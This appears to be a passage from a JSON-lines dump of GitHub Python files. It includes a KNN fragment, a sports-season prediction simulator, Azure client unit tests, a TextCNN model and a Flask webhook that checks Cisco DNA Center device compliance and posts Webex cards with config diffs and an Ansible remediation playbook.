X_train^2)\n train = np.random.randn(1,4)\n test = np.random.randn(1,4)\n num_examples = train.shape[0]\n \n KNN.train(train,np.zeros(num_examples))\n \n distances = np.sqrt(np.sum(test**2, axis=1, keepdims=True) + np.sum(train**2, axis=1, keepdims=True) - 2*np.sum(test*train)) ##keepdims returns (1,1) instead of (1,)\n \n corr_distance = KNN.compute_distance_two_loops(test)\n \n #print(f'The difference is : {np.sqrt(np.sum((corr_distance - distances)**2))}')\n\n\n \"\"\"\n X = np.loadtxt(\"https://raw.githubusercontent.com/aladdinpersson/Machine-Learning-Collection/master/ML/algorithms/knn/example_data/data.txt\", delimiter=',')\n y = np.loadtxt(\"https://raw.githubusercontent.com/aladdinpersson/Machine-Learning-Collection/master/ML/algorithms/knn/example_data/targets.txt\")\n \n KNN = KNearestNeighbour(k=2)\n KNN.train(X, y)\n y_pred = KNN.predict(X, num_loops=1)\n\n \n \n print(f'accuracy: {sum(y_pred==y)/y.shape[0]}')\n \n\n\n\n\n\n\n\n\n\n\n","repo_name":"shivamkc01/MachineLearning_Algorithm__from_scratch","sub_path":"KNN_using_Pytorch_from_scratch.py","file_name":"KNN_using_Pytorch_from_scratch.py","file_ext":"py","file_size_in_byte":4189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73012541695","text":"from hyperopt import fmin, space_eval, tpe\nfrom sklearn.model_selection import StratifiedKFold, cross_val_score\nfrom sklearn.preprocessing import LabelEncoder\n\n\ndef simulate(model, data, season, predictors, output, build=None, evolve=False, freq=1):\n result = output + '_PRED'\n data = data.copy()\n encoder = LabelEncoder().fit(data[output])\n data[output] = encoder.transform(data[output])\n train, test = data[data.SEASON < season].copy(), data[data.SEASON == season].copy()\n\n if build is None:\n build = fit\n\n if evolve:\n test[result] = test[output]\n test_groups = test.groupby('GAME_DATE')\n count = 0\n\n for day in test_groups.groups:\n if count == freq or count == 0:\n build(model, train[predictors], train[output])\n count = 0\n\n games = test_groups.get_group(day)\n test.loc[games.index, [result]] = model.predict(games[predictors])\n train = train.append(games)\n count += 1\n else:\n build(model, train[predictors], train[output])\n test[result] = model.predict(test[predictors])\n\n test[output] = encoder.inverse_transform(test[output])\n test[result] = encoder.inverse_transform(test[result])\n return test\n\n\ndef fit(model, x, y):\n model.fit(x, y)\n\n\nclass HyperOptFit:\n def __init__(\n self, space, max_evals=10, n_splits=10, scoring='roc_auc', random_state=None\n ):\n self.space = space\n self.max_evals = max_evals\n self.n_splits = n_splits\n self.scoring = scoring\n self.random_state = random_state\n\n def fit(self, model, x, y):\n best = fmin(\n lambda params: self.objective(model, params, x, y),\n self.space,\n algo=tpe.suggest,\n max_evals=self.max_evals,\n )\n best_params = space_eval(self.space, best)\n model.set_params(**best_params)\n model.fit(x, y)\n\n def objective(self, model, params, x, y):\n model.set_params(**params)\n cv = StratifiedKFold(n_splits=self.n_splits, random_state=self.random_state)\n score = cross_val_score(model, x, y, cv=cv, scoring=self.scoring)\n return 1 - score.mean()\n","repo_name":"klane/databall","sub_path":"databall/simulate.py","file_name":"simulate.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"79"} +{"seq_id":"21595889745","text":"import random\nfrom unittest.mock import patch\n\nfrom azure.identity import ClientSecretCredential\nfrom azure.mgmt.costmanagement import CostManagementClient\nfrom azure.mgmt.resource import ResourceManagementClient\nfrom azure.mgmt.storage import StorageManagementClient\nfrom azure.storage.blob import BlobServiceClient\nfrom django.test import TestCase\nfrom faker import Faker\n\nfrom providers.azure.client import AzureClientFactory\n\nFAKE = Faker()\n\n\nclass AzureClientFactoryTestCase(TestCase):\n \"\"\"Parent Class for AzureClientFactory test cases.\"\"\"\n\n def setUp(self):\n \"\"\"Test case setup.\"\"\"\n self.clouds = [\"china\", \"germany\", \"public\", \"usgov\"]\n\n @patch(\"providers.azure.client.ClientSecretCredential.get_token\")\n def test_constructor(self, mock_get_token):\n \"\"\"Test that we can create an AzureClientFactory object.\"\"\"\n obj = AzureClientFactory(\n subscription_id=FAKE.uuid4(),\n tenant_id=FAKE.uuid4(),\n client_id=FAKE.uuid4(),\n client_secret=FAKE.word(),\n cloud=random.choice(self.clouds),\n )\n self.assertTrue(isinstance(obj, AzureClientFactory))\n\n @patch(\"providers.azure.client.ClientSecretCredential.get_token\")\n def test_costmanagement_client(self, mock_get_token):\n \"\"\"Test the costmanagement_client property.\"\"\"\n obj = AzureClientFactory(\n subscription_id=FAKE.uuid4(),\n tenant_id=FAKE.uuid4(),\n client_id=FAKE.uuid4(),\n client_secret=FAKE.word(),\n cloud=random.choice(self.clouds),\n )\n self.assertTrue(isinstance(obj.cost_management_client, CostManagementClient))\n\n @patch(\"providers.azure.client.ClientSecretCredential.get_token\")\n def test_credentials(self, mock_get_token):\n \"\"\"Test the credentials property.\"\"\"\n obj = AzureClientFactory(\n subscription_id=FAKE.uuid4(),\n tenant_id=FAKE.uuid4(),\n client_id=FAKE.uuid4(),\n client_secret=FAKE.word(),\n cloud=random.choice(self.clouds),\n )\n self.assertTrue(isinstance(obj._credentials, ClientSecretCredential))\n\n @patch(\"providers.azure.client.ClientSecretCredential.get_token\")\n def test_resource_client(self, mock_get_token):\n \"\"\"Test the resource_client property.\"\"\"\n obj = AzureClientFactory(\n subscription_id=FAKE.uuid4(),\n tenant_id=FAKE.uuid4(),\n client_id=FAKE.uuid4(),\n client_secret=FAKE.word(),\n cloud=random.choice(self.clouds),\n )\n self.assertTrue(isinstance(obj.resource_client, ResourceManagementClient))\n\n @patch(\"providers.azure.client.ClientSecretCredential.get_token\")\n def test_storage_client(self, mock_get_token):\n \"\"\"Test the storage_client property.\"\"\"\n obj = AzureClientFactory(\n subscription_id=FAKE.uuid4(),\n tenant_id=FAKE.uuid4(),\n client_id=FAKE.uuid4(),\n client_secret=FAKE.word(),\n cloud=random.choice(self.clouds),\n )\n self.assertTrue(isinstance(obj.storage_client, StorageManagementClient))\n\n @patch(\"providers.azure.client.ClientSecretCredential.get_token\")\n def test_subscription_id(self, mock_get_token):\n \"\"\"Test the subscription_id property.\"\"\"\n subscription_id = FAKE.uuid4()\n obj = AzureClientFactory(\n subscription_id=subscription_id,\n tenant_id=FAKE.uuid4(),\n client_id=FAKE.uuid4(),\n client_secret=FAKE.word(),\n cloud=random.choice(self.clouds),\n )\n self.assertTrue(obj.subscription_id, subscription_id)\n\n @patch(\"providers.azure.client.ClientSecretCredential.get_token\")\n def test_cloud_storage_account(self, mock_get_token):\n \"\"\"Test the cloud_storage_account method.\"\"\"\n subscription_id = FAKE.uuid4()\n resource_group_name = FAKE.word()\n storage_account_name = FAKE.word()\n obj = AzureClientFactory(\n subscription_id=subscription_id,\n tenant_id=FAKE.uuid4(),\n client_id=FAKE.uuid4(),\n client_secret=FAKE.word(),\n cloud=random.choice(self.clouds),\n )\n with patch.object(StorageManagementClient, \"storage_accounts\", return_value=None):\n cloud_account = obj.cloud_storage_account(resource_group_name, storage_account_name)\n self.assertTrue(isinstance(cloud_account, BlobServiceClient))\n\n @patch(\"providers.azure.client.ClientSecretCredential.get_token\")\n def test_scope_and_export_name(self, mock_get_token):\n \"\"\"Test the scope and export_name properties.\"\"\"\n subscription_id = FAKE.uuid4()\n scope = f\"/subscriptions/{subscription_id}\"\n export_name = \"cost_export\"\n obj = AzureClientFactory(\n subscription_id=subscription_id,\n tenant_id=FAKE.uuid4(),\n client_id=FAKE.uuid4(),\n client_secret=FAKE.word(),\n cloud=random.choice(self.clouds),\n scope=scope,\n export_name=export_name,\n )\n self.assertTrue(obj.scope, scope)\n self.assertTrue(obj.export_name, export_name)\n","repo_name":"project-koku/koku","sub_path":"koku/providers/test/azure/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":5195,"program_lang":"python","lang":"en","doc_type":"code","stars":238,"dataset":"github-code","pt":"79"} +{"seq_id":"1533382856","text":"\nfrom pyspark.sql import SparkSession\nfrom metrics.before import DeltaTableMetricsCollectorBefore\nfrom configure_logging import LoggingConfigurator\n\nif __name__ == \"__main__\":\n # Configure logging settings\n logger = LoggingConfigurator()\n logger.configure_logging()\n\n # Initialize SparkSession for the DeltaTableMetricsCollectorBefore\n spark = SparkSession.builder.appName(\"DeltaTableMetricsCollectorBefore\").getOrCreate()\n \n config_file_path = \"config/param.json\"\n\n # Create an instance of DeltaTableMetricsCollectorBefore and execute the metric collection\n collector = DeltaTableMetricsCollectorBefore(spark,config_file_path)\n collector.collect_metrics()\n","repo_name":"douglasjr1985/databricks_workflow","sub_path":"source/deltacleaner/RunJobBefore.py","file_name":"RunJobBefore.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"1697906026","text":"#!usr/bin/env python\n# coding:utf-8\n# @time :2019/10/30 10:51\n# @author :liteng\n# @function :tensorflow2.0 for textcnn\n# @paper: Convolutional Neural Networks for Sentence Classification\n\n\nimport tensorflow as tf\nfrom tensorflow import keras\n\nfrom model.layers.embeddings import EmbeddingsLayer\n\n\nclass Model(tf.keras.Model):\n def __init__(self, config):\n super(Model, self).__init__()\n self.config = config\n if self.config.embedding.use_embedding:\n self.embedding = EmbeddingsLayer(config.embedding)\n self.reshape = keras.layers.Reshape((config.input_length, config.embedding.hidden_size, 1))\n self.embedding_size = config.embedding.hidden_size\n else:\n self.reshape = keras.layers.Reshape((config.input_length, config.TextCNN.embedding_dimension, 1))\n self.embedding_size = config.TextCNN.embedding_dimension\n #keras.layers.Embedding(config.TextCNN.input_dim, config.TextCNN.embedding_dimension,\n # input_length=config.TextCNN.input_length)\n\n\n self.kernel_sizes = config.TextCNN.kernel_sizes\n self.convs = []\n self.pools = []\n\n for kernel_size in self.kernel_sizes:\n conv = keras.layers.Conv2D(filters=64, kernel_size=(kernel_size, self.embedding_size),\n strides=1, padding='valid', activation='relu')\n self.convs.append(conv)\n pool = keras.layers.MaxPool2D(pool_size=(config.input_length - kernel_size + 1, 1), padding='valid')\n self.pools.append(pool)\n\n #self.top_k = self.config.TextCNN.top_k_max_pooling\n self.flatten = keras.layers.Flatten()\n self.fc = keras.layers.Dense(config.num_classes)\n\n def call(self, inputs,training=None, mask=None):\n print(\"inputs\", inputs)\n x = inputs\n if self.config.embedding.use_embedding:\n x = self.embedding(x)\n print(\"embedding\", x)\n x = self.reshape(x)\n print(\"reshape \", x)\n cnns = []\n for i in range(len(self.convs)):\n conv = self.convs[i](x)\n pool = self.pools[i](conv)\n cnns.append(pool)\n print(\"conv %d\"%i, conv)\n print(\"pool %d\"%i, pool)\n\n x = keras.layers.concatenate(cnns)\n print(\"concat\", x)\n x = self.flatten(x)\n print(\"flatten \", x)\n x = self.fc(x)\n if self.config.logits_type == \"softmax\":\n x = tf.nn.softmax(x)\n elif self.config.logits_type == \"sigmoid\":\n x = tf.nn.sigmoid(x)\n print(\"output \", x)\n return x","repo_name":"xgdlt/text_classification_tf","sub_path":"model/classification/textcnn.py","file_name":"textcnn.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"28638906833","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author: Jeffrey Gao\n# Time: 2020/6/29 22:06\n# Description: 读取配置\n\n\nimport yaml\n\n\nINITIALS_FILE = 'pinyin/initials.yml'\nFINALS_FILE = 'pinyin/finals.yml'\n\n\nclass Config(object):\n\n def __init__(self):\n self.initials_dict = self.load_pinyin_config(INITIALS_FILE)\n self.finals_dict = self.load_pinyin_config(FINALS_FILE)\n\n @staticmethod\n def load_pinyin_config(file):\n \"\"\"\n 加载拼音的配置文件\n :param file:\n :return:\n \"\"\"\n return yaml.safe_load(open(file, 'r', encoding='utf-8'))\n\n\nconfig_basic = Config()\n","repo_name":"gcbanana/find_confused_words","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"12533234016","text":"'''\nGiven an integer array nums and an integer k, return the k most frequent elements. You may return the answer in any order.\n'''\n\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n from collections import Counter\n ans = []\n counts = Counter(nums)\n return [ele[0] for ele in counts.most_common(k)]\n","repo_name":"atharvamm/programming_notes","sub_path":"python/prac/leetcode/347.py","file_name":"347.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42757207835","text":"__author__ = \"Gabriel Zapodeanu TME, ENB\"\n__email__ = \"gzapodea@cisco.com\"\n__version__ = \"0.1.0\"\n__copyright__ = \"Copyright (c) 2021 Cisco and/or its affiliates.\"\n__license__ = \"Cisco Sample Code License, Version 1.1\"\n\n\nimport os\nimport time\nimport urllib3\nimport json\nimport difflib\nimport webex_apis\nimport yaml\nimport logging\n\nfrom flask import Flask, request, send_from_directory\nfrom flask_basicauth import BasicAuth\nfrom requests.auth import HTTPBasicAuth # for Basic Auth\nfrom urllib3.exceptions import InsecureRequestWarning # for insecure https warnings\nfrom dotenv import load_dotenv\nfrom dnacentersdk import DNACenterAPI\n\nurllib3.disable_warnings(InsecureRequestWarning) # disable insecure https warnings\n\nload_dotenv('environment.env')\n\nWEBHOOK_USERNAME = os.getenv('WEBHOOK_USERNAME')\nWEBHOOK_PASSWORD = os.getenv('WEBHOOK_PASSWORD')\n\nDNAC_URL = os.getenv('DNAC_URL')\nDNAC_USER = os.getenv('DNAC_USER')\nDNAC_PASS = os.getenv('DNAC_PASS')\n\nWEBEX_BOT_AUTH = os.getenv('WEBHOOKD_BOT_AUTH')\nWEBEX_URL = os.getenv('WEBEX_URL')\nWEBEX_ROOM = os.getenv('WEBHOOKD_ROOM')\n\nos.environ['TZ'] = 'America/Los_Angeles' # define the timezone for PST\ntime.tzset() # adjust the timezone, more info https://help.pythonanywhere.com/pages/SettingTheTimezone/\n\napp = Flask(__name__)\n\napp.config['BASIC_AUTH_USERNAME'] = WEBHOOK_USERNAME\napp.config['BASIC_AUTH_PASSWORD'] = WEBHOOK_PASSWORD\n# app.config['BASIC_AUTH_FORCE'] = True # enable if all API endpoints support HTTP basic auth\n\nbasic_auth = BasicAuth(app)\n\nDNAC_AUTH = HTTPBasicAuth(DNAC_USER, DNAC_PASS)\n\n\ndef pprint(json_data):\n \"\"\"\n Pretty print JSON formatted data\n :param json_data: data to pretty print\n :return None\n \"\"\"\n print(json.dumps(json_data, indent=4, separators=(' , ', ' : ')))\n\n\ndef time_sleep(time_sec):\n \"\"\"\n This function will wait for the specified time_sec, while printing a progress bar, one '!' / second\n Sample Output :\n Wait for 10 seconds\n !!!!!!!!!!\n :param time_sec: time, in seconds\n :return: none\n \"\"\"\n print('\\nWait for ' + str(time_sec) + ' seconds')\n for i in range(time_sec):\n print('!', end='')\n time.sleep(1)\n return\n\n\ndef compare_configs(cfg1, cfg2):\n \"\"\"\n This function, using the unified diff function, will compare two config files and identify the changes.\n '+' or '-' will be prepended in front of the lines with changes\n :param cfg1: old configuration file path and filename\n :param cfg2: new configuration file path and filename\n :return: text with the configuration lines that changed. The return will include the configuration for the sections\n that include the changes\n \"\"\"\n\n # open the old and new configuration files\n f1 = open(cfg1, 'r')\n old_cfg = f1.readlines()\n f1.close()\n\n f2 = open(cfg2, 'r')\n new_cfg = f2.readlines()\n f2.close()\n\n # compare the two specified config files {cfg1} and {cfg2}\n d = difflib.unified_diff(old_cfg, new_cfg, n=9)\n\n # create a diff_list that will include all the lines that changed\n # create a diff_output string that will collect the generator output from the unified_diff function\n diff_list = []\n diff_output = ''\n\n for line in d:\n diff_output += line\n if line.find('xxxx') == -1:\n if line.find('quit') == -1:\n if (line.find('+++') == -1) and (line.find('---') == -1):\n if (line.find('-!') == -1) and (line.find('+!') == -1):\n if line.startswith('+'):\n diff_list.append('\\n' + line)\n elif line.startswith('-'):\n diff_list.append('\\n' + line)\n\n # process the diff_output to select only the sections between '!' characters for the sections that changed,\n # replace the empty '+' or '-' lines with space\n diff_output = diff_output.replace('+!', '!')\n diff_output = diff_output.replace('-!', '!')\n diff_output_list = diff_output.split('!')\n\n all_changes = []\n\n for changes in diff_list:\n for config_changes in diff_output_list:\n if changes in config_changes:\n if config_changes not in all_changes:\n all_changes.append(config_changes)\n\n # create a config_text string with all the sections that include changes\n config_text = ''\n for items in all_changes:\n config_text += items\n\n return config_text\n\n\n@app.route('/') # create a decorator for testing the Flask framework\n@basic_auth.required\ndef index():\n return '

Flask Receiver App is Up!

', 200\n\n\n@app.route('/compliance_check', methods=['POST']) # API endpoint to receive the compliance event notifications\n@basic_auth.required\ndef compliance_check():\n\n # logging, debug level, to file {application_run.log}\n logging.basicConfig(\n filename='application_run.log',\n level=logging.DEBUG,\n format='%(asctime)s.%(msecs)03d %(levelname)s %(module)s - %(funcName)s: %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n\n if request.method == 'POST':\n print('Webhook Received')\n webhook_json = request.json\n\n # save to a file, create new file if not existing, append to existing file\n with open('compliance_check_data.log', 'a') as filehandle:\n filehandle.write('%s\\n' % json.dumps(webhook_json))\n\n # print the received notification\n print('Payload: ')\n print(webhook_json, '\\n')\n\n # check if a new open issue, ignore if an resolved issue notification\n issue_status = webhook_json['details']['Assurance Issue Status']\n if issue_status == 'resolved':\n return 'Notification Received', 202\n\n # identify the Cisco DNA Center reporting the issue\n dnac_ip = webhook_json['dnacIP']\n dnac_url = 'https://' + dnac_ip\n\n # create a DNACenterAPI \"Connection Object\"\n dnac_api = DNACenterAPI(username=DNAC_USER, password=DNAC_PASS, base_url=dnac_url, version='2.2.2.3', verify=False)\n\n # identify what type of event notification was received\n event_id = webhook_json['eventId']\n print('\\nEvent Id:', event_id)\n\n # identify the event details\n event_details = webhook_json['details']['Assurance Issue Details']\n print('Event Details:', event_details)\n print('Cisco DNA Center Reporting the issue:', dnac_ip)\n event_link = webhook_json['ciscoDnaEventLink']\n\n # parse the payload for the event, and select device info\n device_management_ip = webhook_json['details']['Device']\n print('Device Management IP Address:', device_management_ip)\n device_info = dnac_api.devices.get_network_device_by_ip(ip_address=device_management_ip)\n device_hostname = device_info['response']['hostname']\n print('Device Hostname:', device_hostname)\n device_id = device_info['response']['id']\n print('Device Id:', device_id)\n\n # post message to Webex Room\n room_id = webex_apis.get_room_id(WEBEX_ROOM)\n\n card_message = {\n \"roomId\": room_id,\n \"parentId\": None,\n \"markdown\": \"Cisco DNA Center Notification\",\n \"attachments\": [\n {\n \"contentType\": \"application/vnd.microsoft.card.adaptive\",\n \"content\": {\n \"$schema\": \"http://adaptivecards.io/schemas/adaptive-card.json\",\n \"type\": \"AdaptiveCard\",\n \"version\": \"1.0\",\n \"body\": [\n {\n \"type\": \"TextBlock\",\n \"text\": \"Cisco DNA Center Notification\",\n \"weight\": \"bolder\",\n \"size\": \"large\"\n },\n {\n \"type\": \"FactSet\",\n \"facts\": [\n {\n \"title\": \"Assurance Issue Details:\",\n \"value\": event_details\n },\n {\n \"title\": \"Device Hostname:\",\n \"value\": device_hostname\n },\n {\n \"title\": \"Device Management IP:\",\n \"value\": device_management_ip\n },\n {\n \"title\": \"Cisco DNA Center IP\",\n \"value\": dnac_ip\n }\n ]\n }\n ],\n \"actions\": [\n {\n \"type\": \"Action.openURL\",\n \"title\": \"Cisco DNA Center Issue Details\",\n \"url\": event_link\n }\n ]\n }\n }\n ]\n }\n\n response = webex_apis.post_room_card_message(WEBEX_ROOM, card_message)\n response_json = response.json()\n message_id = response_json['id']\n\n print('\\nCisco DNA Center notification message posted')\n\n # collect device detail info\n device_detail_response = dnac_api.devices.get_device_detail(identifier='uuid', search_by=device_id)\n device_detail_json = device_detail_response['response']\n device_sn = device_detail_json['serialNumber']\n device_os_version = device_detail_json['softwareVersion']\n device_family = device_detail_json['platformId']\n device_location = device_detail_json['location']\n\n print('\\nDevice Family:', device_family)\n print('Device OS Version:', device_os_version)\n print('Device Serial Number:', device_sn)\n print('Device Location:', device_location)\n\n time.sleep(1)\n card_message = {\n \"roomId\": room_id,\n \"parentId\": message_id,\n \"markdown\": \"Device Details\",\n \"attachments\": [\n {\n \"contentType\": \"application/vnd.microsoft.card.adaptive\",\n \"content\": {\n \"$schema\": \"http://adaptivecards.io/schemas/adaptive-card.json\",\n \"type\": \"AdaptiveCard\",\n \"version\": \"1.0\",\n \"body\": [\n {\n \"type\": \"TextBlock\",\n \"text\": \"Cisco DNA Center Device Details\",\n \"weight\": \"bolder\"\n },\n {\n \"type\": \"FactSet\",\n \"facts\": [\n {\n \"title\": \"Family:\",\n \"value\": device_family\n },\n {\n \"title\": \"Serial Number:\",\n \"value\": device_sn\n },\n {\n \"title\": \"OS Version:\",\n \"value\": device_os_version\n },\n {\n \"title\": \"Location\",\n \"value\": device_location\n }\n ]\n },\n {\n \"type\": \"TextBlock\",\n \"wrap\": True,\n \"text\": \"Collecting Compliance information, this will take few minutes\"\n }\n ],\n \"actions\": [\n {\n \"type\": \"Action.openURL\",\n \"title\": \"Device 360 View\",\n \"url\": 'https://10.93.141.45/dna/assurance/device/details?id=' + device_id\n }\n ]\n }\n }\n ]\n }\n\n response = webex_apis.post_room_card_message(WEBEX_ROOM, card_message)\n\n print('\\nDevice Details message posted\\nWait for Config Compliance timer')\n time_sleep(180)\n\n # re-sync device\n resync = dnac_api.devices.sync_devices_using_forcesync(force_sync=True, payload=[device_id])\n print('\\n\\nDevice re-sync started, wait for re-sync to complete')\n time_sleep(180)\n\n # check compliance\n run_compliance = dnac_api.compliance.run_compliance(deviceUuids=[device_id])\n compliance_task_id = run_compliance['response']['taskId']\n print('\\n\\nCompliance Task Id:', compliance_task_id)\n\n # wait for 30 seconds for compliance checks to complete\n time_sleep(30)\n\n # check task by id\n task_info = dnac_api.task.get_task_by_id(task_id=compliance_task_id)\n task_result = task_info['response']['progress']\n print('\\n\\nCompliance check status:', task_result)\n\n # retrieve the compliance status\n compliance_info = dnac_api.compliance.compliance_details_of_device(device_uuid=device_id)\n compliance_info_json = compliance_info['response']\n compliance_status = {}\n facts = [] # to be used for the adaptive cards message\n for check in compliance_info_json:\n print('Compliance Type:', check['complianceType'], ', Status:', check['status'])\n compliance_status.update({check['complianceType']: check['status']})\n facts.append({'title': check['complianceType'], 'value': check['status']})\n\n # update Webex room with compliance result\n card_message = {\n \"roomId\": room_id,\n \"parentId\": message_id,\n \"markdown\": \"Device Compliance\",\n \"attachments\": [\n {\n \"contentType\": \"application/vnd.microsoft.card.adaptive\",\n \"content\": {\n \"$schema\": \"http://adaptivecards.io/schemas/adaptive-card.json\",\n \"type\": \"AdaptiveCard\",\n \"version\": \"1.0\",\n \"body\": [\n {\n \"type\": \"TextBlock\",\n \"text\": \"Device Compliance\",\n \"weight\": \"bolder\"\n },\n {\n \"type\": \"FactSet\",\n \"facts\": facts\n }\n ],\n \"actions\": [\n {\n \"type\": \"Action.openURL\",\n \"title\": \"Device Compliance\",\n \"url\": 'https://10.93.141.45/dna/provision/devices/inventory/device-details?deviceId=' + device_id + '&defaultTab=Summary'\n }\n ]\n }\n }\n ]\n }\n response = webex_apis.post_room_card_message(WEBEX_ROOM, card_message)\n\n print('\\nCompliance Status message posted')\n\n # check config compliance state\n if compliance_status['RUNNING_CONFIG'] == 'NON_COMPLIANT':\n # trigger workflow to identify what has changed\n\n # send command runner API for \"show run\" and \"show start\"\n show_run_result = dnac_api.command_runner.run_read_only_commands_on_devices(deviceUuids=[device_id], commands=['show running-config'])\n show_run_task_id = show_run_result['response']['taskId']\n time.sleep(5) # for pacing the API calls\n show_start_result = dnac_api.command_runner.run_read_only_commands_on_devices(deviceUuids=[device_id], commands=['show startup-config'])\n show_start_task_id = show_start_result['response']['taskId']\n\n # wait for Command Runner APIs to execute\n print('\\nWait for Command Runner APIs tasks to complete')\n time_sleep(30)\n\n # collect the show running output file\n show_run_task_result = dnac_api.task.get_task_by_id(task_id=show_run_task_id)\n show_run_file_info = show_run_task_result['response']['progress']\n show_run_file_id = json.loads(show_run_file_info)['fileId']\n print('\\n\\nThe show running file id:', show_run_file_id)\n\n show_run_file_result = dnac_api.file.download_a_file_by_fileid(file_id=show_run_file_id, save_file=False)\n # the function will return data encoded using\n # \n\n # retrieve the running config\n show_run_file_json = json.loads(show_run_file_result.data.decode('utf-8'))\n show_run_file_content = show_run_file_json[0]['commandResponses']['SUCCESS']['show running-config'].replace('show running-config','')\n\n # remove all the config lines before version\n show_run_file_updated = show_run_file_content.split('version')[1]\n\n # save the running config to file\n run_file = device_hostname + '_run.txt'\n f_temp = open(run_file, 'w')\n f_temp.write(show_run_file_updated)\n f_temp.seek(0) # reset the file pointer to 0\n f_temp.close()\n\n # collect the show startup-config output file\n show_start_task_result = dnac_api.task.get_task_by_id(task_id=show_start_task_id)\n show_start_file_info = show_start_task_result['response']['progress']\n show_start_file_id = json.loads(show_start_file_info)['fileId']\n print('The show startup-config file id:', show_start_file_id)\n\n show_start_file_result = dnac_api.file.download_a_file_by_fileid(file_id=show_start_file_id, save_file=False)\n # the function will return data encoded using\n # \n\n # retrieve the startup config\n show_start_file_json = json.loads(show_start_file_result.data.decode('utf-8'))\n show_start_file_content = show_start_file_json[0]['commandResponses']['SUCCESS']['show startup-config'].replace(\n 'show startup-config', '')\n\n # remove all the config lines before version\n show_start_file_updated = show_start_file_content.split('version')[1]\n\n # save the startup config to file\n start_file = device_hostname + '_start.txt'\n f_temp = open(start_file, 'w')\n f_temp.write(show_start_file_updated)\n f_temp.seek(0) # reset the file pointer to 0\n f_temp.close()\n\n print('The running config and startup config have been collected and saved to files')\n\n # check for the config diff\n diff_result = compare_configs(start_file, run_file)\n print('\\n\\nThe Config Diff:\\n', diff_result)\n\n # save the diff to file\n diff_file = device_hostname + '_diff.txt'\n f_temp = open(diff_file, 'w')\n f_temp.write(diff_result)\n f_temp.seek(0) # reset the file pointer to 0\n f_temp.close()\n\n body = [\n {\n \"type\": \"TextBlock\",\n \"text\": \"Device Configuration Changes\",\n \"weight\": \"bolder\"\n },\n {\n \"type\": \"TextBlock\",\n \"wrap\": True,\n \"text\": \"There are differences between the \\nRunning Configuration and Start Configuration.\"\n },\n {\n \"type\": \"TextBlock\",\n \"wrap\": True,\n \"text\": \"Lines marked wth '+' have been added to the Running Configuration, \\nLines marked with '-' have been removed from the Running Configuration\"\n }\n ]\n\n # prepare the Webex message with diff config\n\n diff_result_update_message = diff_result.replace(\"\\n+\", \"\\n'+' \")\n diff_result_update_final = diff_result_update_message.replace(\"\\n-\", \"\\n'-' \")\n\n body.append({'type': 'TextBlock', 'text': diff_result_update_final, \"wrap\": True, \"color\": \"attention\"})\n\n card_message = {\n \"roomId\": room_id,\n \"parentId\": message_id,\n \"markdown\": \"Device Configuration Changes\",\n \"attachments\": [\n {\n \"contentType\": \"application/vnd.microsoft.card.adaptive\",\n \"content\": {\n \"$schema\": \"http://adaptivecards.io/schemas/adaptive-card.json\",\n \"type\": \"AdaptiveCard\",\n \"version\": \"1.0\",\n \"body\": body\n }\n }\n ]\n }\n\n response = webex_apis.post_room_card_message(WEBEX_ROOM, card_message)\n\n print('\\nConfig Diff Webex message posted')\n\n # prepare CLI templates\n diff_result_update = diff_result.replace('\\n+', '\\nno')\n diff_result_final = diff_result_update.replace('\\n-', '\\n')\n\n print('\\nRemediation CLI Template:\\n', diff_result_final)\n\n # create Ansible Playbook\n source_file = \"project.yml\"\n ansible_file = device_hostname + '.yml'\n\n with open(source_file) as file:\n data_list = yaml.load(file, Loader=yaml.SafeLoader)\n\n data_dict = data_list[0]\n data_dict['vars']['cli_template'] = diff_result_final\n\n final_data = [data_dict]\n\n with open(ansible_file, 'w') as file:\n yaml.dump(final_data, file, default_flow_style=False)\n\n # upload the Ansible playbook file to Webex\n card_message = {\n \"roomId\": room_id,\n \"parentId\": message_id,\n \"markdown\": \"Ansible Playbook\",\n \"attachments\": [\n {\n \"contentType\": \"application/vnd.microsoft.card.adaptive\",\n \"content\": {\n \"$schema\": \"http://adaptivecards.io/schemas/adaptive-card.json\",\n \"type\": \"AdaptiveCard\",\n \"version\": \"1.0\",\n \"body\": [\n {\n \"type\": \"TextBlock\",\n \"text\": \"Ansible Playbook\",\n \"weight\": \"bolder\"\n },\n {\n \"type\": \"TextBlock\",\n \"wrap\": True,\n \"text\": \"Here is attached the Ansible Playbook to remediate the configuration drift\"\n },\n {\n \"type\": \"TextBlock\",\n \"wrap\": True,\n \"text\": \"Execute the attached file by using the command:\\n\"\n },\n {\n \"type\": \"TextBlock\",\n \"wrap\": True,\n \"text\": 'ansible-playbook -e \"device_name=' + device_hostname + ' dnac_host=' + dnac_ip + '\" ' + ansible_file\n }\n ]\n }\n }\n ]\n }\n\n response = webex_apis.post_room_card_message(WEBEX_ROOM, card_message)\n time.sleep(2)\n response = webex_apis.post_room_file(WEBEX_ROOM, ansible_file, 'text/plain', message_id)\n\n print('\\nAnsible Playbook uploaded to Webex')\n\n return 'Notification Received', 202\n else:\n return 'Method not supported', 405\n\n\n@app.route('/compliance_check_data', methods=['GET']) # API endpoint to return the compliance check activity data, consumption by other apps\n@basic_auth.required\ndef compliance_check_data():\n print('File \"compliance_check_data.log\" requested, transfer started')\n return send_from_directory('', 'compliance_check_data.log', as_attachment=True)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True, 